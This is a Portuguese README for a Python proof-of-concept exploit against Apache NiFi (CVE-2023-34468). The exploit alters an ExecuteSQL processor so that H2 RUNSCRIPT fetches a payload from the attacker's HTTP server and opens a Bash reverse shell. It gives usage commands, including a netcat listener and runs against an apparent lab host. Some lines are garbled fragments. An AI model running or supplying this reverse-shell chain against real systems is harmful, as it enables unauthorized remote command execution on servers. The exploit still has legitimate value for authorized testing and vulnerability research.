
CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
PoC curto em Python para abusar de um processador ExecuteSQL editável do Apache NiFi com um payload H2 RUNSCRIPT para acionar execução remota de comandos através de um reverse shell Bash.
Apenas para testes autorizados e pesquisa. Não use contra sistemas que você não possui ou não tem permissão explícita para testar.
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
--processor-id manualmente.rce.sql que define e chama um alias de execução shell com suporte Java.nc e servidor HTTP.rce.sql através do H2 RUNSCRIPT.



git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
Terminal 1:
rlwrap nc -lvnp 4444
Terminal 2:
python3 -m http.server 8000
Terminal 3:
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
Para seleção manual do processador:
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
| Produto | Versão Afetada | Acesso Necessário | Impacto |
|---|---|---|---|
| Apache NiFi | Implementações afetadas pelo CVE-2023-34468 que usam comportamento editável do ExecuteSQL/H2 | Capacidade de alcançar e modificar o processador NiFi alvo através da API | Execução remota de comandos |
rce.sql gerado é ignorado pelo git e deve ser servido a partir do diretório do repositório com python3 -m http.server.--processor-id.ozcanpng — github.com/ozcanpng — ozcanpng.dev